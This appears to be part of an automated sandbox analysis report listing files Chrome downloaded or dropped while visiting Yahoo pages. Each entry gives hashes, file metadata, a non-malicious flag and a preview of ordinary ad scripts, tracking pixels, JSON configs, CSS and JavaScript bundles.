                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:if (!window.mraid) {document.write('\x3cdiv id="ad_unit"\x3e');}document.write('\x3cstyle\x3ediv{margin:0;padding:0;}.abgcp{height:15px;padding-right:1px;padding-top:1px;padding-left:9px;padding-bottom:9px;right:0px;top:0px;position:absolute;width:31px;z-index:2147483646;}.abgc{display:block;height:15px;position:absolute;right:1px;top:1px;text-rendering:geometricPrecision;z-index:2147483646;}.abgb{display:inline-block;height:15px;}.abgc,.abgcp,.jar .abgc,.jar .abgcp,.jar .cbb{opacity:1;}.abgc{cursor:pointer;}.cbb{cursor:pointer;height:15px;width:15px;z-index:2147483646;background-color:#ffffff;opacity:0;}.cbb svg{position:absolute;top:0;right:0;height:15px;width:15px;stroke:#00aecd;fill:#00aecd;stroke-width:1.25;}.abgb{position:absolute;right:16px;top:0px;}.cbb{position:absolute;right:0px;top:0px;}.abgs{display:none;height:100%;}.abgl{text-decoration:none;}.abgs svg,.abgb svg{display:inline-block;height:15px;width:auto;vertical-align:top;}.abgc .il-wrap{background-color:#ffffff;height:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.969132549947844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:MAbQ/jEBOkdlzuyDNMSQqlPcr7QBY8iXfhZeHTNMXTxS+4k3l7OAr3qk572dJo5g:XQ7olzlM9yPcPQLsMW74k31Fr6AO+F/i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3CDE8085902CD483530770CB28DB2F74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:527E30FB0B583554EDF0376B38572CEF0CCF7D8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3DAADEB891EDB99FBFDFD71710DED618131FFBC994F14E40D4709A8F7E98ED88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0C831981F7BBE3BFEE40453F91A740A60E6D218EEF37E947F124B50E815C16DEA110CE90B7810E6FD355CAE2413CB61A4CC1AD991D164D807702F9A5DE1325D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................,............................................Z...........................!1.AQa.."q..#2....BRb.....$3Tr...DEe........%45CUVcs..&FS.....................................>........................!..1..AQ"2Raq.....#BS.$3..4Cb...%5..............?..........Tw.K \D:{...V.S\..`..A..*K....!]yQ2....x.)...w.,.....Z!.P....A,.%o.7........4.'..f.....yPH...W>..J.M.T..G...F.......hz.........%B!{>.!*...:.2|....%...... ...B..0?........J.....3...+....4.P.[-.R.....$dd.@..V^.......|.n=K.....m....)......a....AJ.N...<.....O..?<..........V....W....&9l4......K.D:....V....>........Jy{..}...........z...G+R..M.Vz.<.c...#%a..+..t.....:.....Y....s.t+..e...n.5T.b.a[`........K.,....j4....3.|.y...K.U..,.+Iv....Ec8..5.2..t58.>.I...>..P.......2..35"..1y9.jL:.=.O'.Z~.m..O2sR .d2}=...d&2q>..B...<...&.X...Cq.O}6.u.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://sync.srv.stackadapt.com/sync?nid=20&gdpr=0&gdpr_consent=&gpp=&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.022915397373588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:brdqhBVNMUeEqvDUXC7g7ZneXtDRHDjVFWuL8nsfaxKHP:brdQfMUevUkYwdDRHDjVF2nu7P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D2CEE29FFE048B2550F8A676634308B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7920BE289B90AEB84EC9A6F47AB1964D45BA3964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F967D2CB91E122B26B512CF6C7B4F1211723C105239238C4E56F02E0BC4432F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:74F656EBA0C5F7E44828FD5852BBF911514C4D29AFD8F7965FFA3C2F7F6200FA12EAF9AABAE1662C93C1E99B5741E810D46741C8674B3FF46D51ACEC420D7701
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=xfad&tv=01_252&st=int
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"sodar_query_id":"-oQFZ5q8J8uSjuwPqKbImAI","injector_basename":"sodar2","bg_hash_basename":"_AApIiWo-qoygbJTte9jDqAiWCWSDTrVJ4yIX1hHtxY","bg_binary":"SGaGqSD29fALGi2CO1F5koQr0Mcg2+6R+Bkk3ueu+LKpkIgW3aSq4qHK1eYSMjktUFGxDBwNp5FvOyi0jq2aVy4tJhodBDcf5ExN4kbnMX9PKPreR80GHbROv26WFGSKEPr7p5+33I7dpVJ7+bOg2qVOfqgqWYsOF2aPMpprjAYVmE2C+DUzN2krv1Mmf3xC1OkYCbgqNZXbHeGQ7wO1m6VdwPtuvc0z+WmhCGWsWFilPU66KuADapzNvaAiwab1pyG8k3WFBj0RAKHgHTuIT0VYXAaOLPm9AjRth7e4Foq5LcZ5CQUV2fatN90if5EXCn8ctu1uOqR5gN6AkON2CW5wS8o8yMfy3USrI7FC/Z9p79ypkTfiXR+a+vGrLGuB1uWuFJGCf8mrAxdLs/PwP4P9azftyGpVQYyrIRdp145J7ovdxUsuMvJ0rmCr2oEqzMxuJsj+4kGxX8tvxhXFSuSGvtrmL9JmyIbd5NtmDBKTRDdSUTiukhrmjoC5v2hbj1rR6YclY5SNxSjHSi3EQz4Ffv3KjO6XZI6VcYKYyh7sAq/BKNuBSxTxe75eRi38URGgM3j3k9gtxaxuIdkwM+3Ogcid0o7VPevoItGg+iYVrrq5FGL7q2rmEYGn9VWcbSMAX/CxC07Cc5qGy106+FYwPgEVUgHRcb2C1C0CQ1E4bwkPN4CoP5Vsbd1qHVhwrb/DgHW2AvBCSN/vyChmO0Q6H9sD0NqN8aF2+fBCsDDI1pX9jLxtXdldB0TWby5zbh7Q6otfbjq3EhHjdv8NAh7gGWPHpSXDJs6hcCevr52QL1/QQfgBiTVefeV41TUIx1Mm6DmPn+vDrZ8rB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.496574330097901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:C/2A3njBWk9JyiA:C/nXjB7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1B177A4068E01AC77B85B091C87251BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7A08A7C139D4A7512B6BAAB5AAC4A3E288B255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F77F47058428A1C21DAD5A75AC13FBFDEB9858947218FEE2112FDED5972A0B5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6E6D693775AA9C94540D0CA0549C98446048189D49A3716895F62C3EFE3893F0B28FEDACDCD46394782B7972D0B981E87EA291E76EF2490258FCABA2A0906D92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.advBidxc.mnetRtusId({"status":"Unknown","userid":""});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.8739754318490536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:M3ntzl7/lHh/:cplf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65786C291A4603AA5150A1884452838D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:612B96A8FE9F1C36E8349696A608780E6089AC77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DE3A7CA2F8AE592AAE2652335B755B0D0B65DF663DDA8776387CAE7339B76D64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F0DCF63AAB5264F143B8B012800D771615669D4B833ECCABF8A78449BC2571E8A331992C3A92936FAE8D5F3E1A5DCB940B7921B6A74318187107BAC93C863C9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF87a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=sonobi&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=5b0c551b-17e2-488b-b6fe-49250930e88a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):78000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.38988560871447
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:0OVy3/5/Ix02uDPGofcr++RgpOifEvj8h45Rfw+63:aR402YGoEbBvQh45R563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:20032D3C9AB046304782A7F18BF85C24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A4D5E84874AEDD40ED0C3FADD596A54075A5D9DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5816D28F1A8429AF0C7AF165A129149225CFABA9FC1667519C057ADC46D9160D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:196A6DEB2F1214C7ACBD53AB7868733E39A082442299034A9C1A3F39D79FDB41CA13A0E39333E092828771B9621CF72E670BD478C64EE877BE7CC7BA0E90AE37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",A="VERSION",C={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.423645601696178
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:/ZG/ue3I/yNy/QO/wZo/K3y/VS/hKP/4S/9ClvNp/CaI26N:/AYbrHeywcH8HI1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9FAF9F0AF03805FD10E24FD7A54CA611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:08040307BA428BDE6AE12DA50273BA339F681AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F26B4A53465EBC250CF44D422A38CBE2D812476AEA4E9215485C16B888273EE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FF7FA984E9B3C6397D0C258ADC6AD74229B7E72C80E25230220A197941F1B90E517C11145DACB3FEB0B89B3A49BDBE74EE7190DC7B123458A323693B8F5E267F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://www.yahoo.com/manifest_desktop_us.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "background_color": "#ffffff",. "display": "standalone",. "gcm_user_visible_only": true,. "icons": [. {. "sizes": "48x48",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_48.png",. "type": "image/png". },. {. "sizes": "72x72",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_72.png",. "type": "image/png". },. {. "sizes": "96x96",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_96.png",. "type": "image/png". },. {. "sizes": "128x128",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_128.png",. "type": "image/png". },. {. "sizes": "144x144",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_144.png",. "type": "image/png". },. {.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65354)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):98590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.262081609860911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:l6uJO46KoxxmzxgwyPtXjgypu5DUWCsHEGh363pz1ndumnf:KrxhPSyp0R63pR7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:93C71F7FAF9DCA7767823C99109C81D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:01E7B25914D48BB4DD3CD2E6F60CFCD99CAA10EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66776998B10E583A72F8FD29391A50E2C80EB3BC9A65B0DAFE97E576D7D88507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3E02E2F714D1FB066FFD376FACFD936E75D01D6862D4F7FC353B1D0E725FE3294BBAAE85268DB46541AC7B55D44AC8721A685113FA0D8FD617B323D6DE768B7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:// Hash: ioxxdjHDzFBt50jsKHcULoEjfPjn7FupHUObUXTEulH1iImcaT1OYYq4nXedv+v6ystL/mciw43eN2N1sBqukEcB1G3yLaozwAQoZarIvpe+op2I8dDWCrnmQL5aA3TRFA2hIGMEsGDPdljIfZlxPKB5Tt8rZMkwd8T+7UEJODk=.!function(e){"use strict";var n=function(e,t){return(n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var i in t)t.hasOwnProperty(i)&&(e[i]=t[i])})(e,t)};function t(e,t){function i(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(i.prototype=t.prototype,new i)}var L=function(){return(L=Object.assign||function(e){for(var t,i=1,n=arguments.length;i<n;i++)for(var r in t=arguments[i])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function i(e,t){var i={};for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&t.indexOf(n)<0&&(i[n]=e[n]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols){var r=0;for(n=Object.getOwnPropertySymbols(e);r<n.length;r++)t.indexOf(n[r])<0&&Object.prototype.pro
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.712616563263837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:F/YR8YUGQCK4FdhD94oRzQywXEXyw3n94Epnt9vVD:FFYUUKYDRR8ylXyqn5pXv9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5431755EFEDEF716D3324875A510AFAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FEFC809B0EF8F260ECC3B2B751E8CD8ECFF80AB9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B0168D0934BBBDA0C1F83EF273E59FA51FE9EC19A35EFF9405A4A2F1C4C3E9E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E4931F80DD964383F7CE42F96C2A8B016699D43364FA11B52D2386DFC9F1C7ABBA0D043D18585FD171977E564E2180B8132718B1C39B699D2CAC231983ACBC6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/stores.DPDRpTFd.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as r}from"./43.CtYdpA_T.js";const e=()=>{const s=r;return{page:{subscribe:s.page.subscribe},navigating:{subscribe:s.navigating.subscribe},updated:s.updated}},n={subscribe(s){return e().page.subscribe(s)}},i={subscribe(s){return e().navigating.subscribe(s)}};export{e as g,i as n,n as p};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (589)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.934608603853675
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:di46Gej1VWmZjTJ4GSKOvOgoIXCKkREp8IROSEnKIR/RSYQHIRkcxDXYXYzRFMf7:YGexV33J4V1lzTp8+DsrK9cxLYjfo1En
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F99C3862781B9E7A4EF7E403A6C9B220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:53E5094A293B691361F046E81BA2148AC217A3B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EA838382143075E48253946B6B191244E9A6C7C983AB4E7012089172D6D00C32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:78D9D31B5DAF296C12D428D1FC86B6FFD2184E5B308556BB27DE055B1EEF25528CBB1702950C51E3F3EE8E7411529119094408B2F0935626D859CFFBB4B10CDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/StatusTag.CEoB-Y-F.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:div.yf-p6px5b{display:inline-flex;justify-content:center;align-items:center;border-radius:var(--border-radius-s);font-weight:var(--font-medium);font-size:var(--font-m);color:var(--white);padding:.125rem .375rem;line-height:1.25}div.bullish.yf-p6px5b{background-color:var(--positive)}div.bearish.yf-p6px5b{background-color:var(--negative)}div.neutral.yf-p6px5b{background-color:var(--neutral)}div.empty.yf-p6px5b{padding:.125rem 0;color:var(--secondary);background-color:var(--ui-gray-200)}div.filled.yf-p6px5b{background-color:var(--enabled-l2)}div.caps.yf-p6px5b{text-transform:uppercase}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (419)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.646165904554131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:BC69mc4sl3O4b1/3mjGVuNM3r2Gi2i4gc13UXc7Rig8PhCR0V+v4v:061Pb1ej2Fr2iLgS3OIARE4v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B2A9502704DCBABFBA520502814A7F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:653E95FEF2F6F4A50F0AC9F254F65A5FEFC2F7D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3305A6BA0F384325F4050D2E0042DAD3F96498116955274B4E1A633640336B6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1035B0C6FFD0F5AA3E07E14C9B4FAA3874A6FF2BFC5104CD6F54A4BD79BF3D5E7727A1C486CACE2628E1261C59A856BFC702D1223081569FDA3C6A0771B7ACAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.39 11 16 12.61V11zM17 7h-4v1.9h4c1.71 0 3.1 1.39 3.1 3.1 0 1.27-.77 2.37-1.87 2.84l1.4 1.4A4.99 4.99 0 0 0 22 12c0-2.76-2.24-5-5-5M2 4.27l3.11 3.11A4.99 4.99 0 0 0 2 12c0 2.76 2.24 5 5 5h4v-1.9H7c-1.71 0-3.1-1.39-3.1-3.1 0-1.59 1.21-2.9 2.76-3.07L8.73 11H8v2h2.73L13 15.27V17h1.73l4.01 4.01 1.41-1.41L3.41 2.86z"/></svg>';export{h as U};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.347811435468635
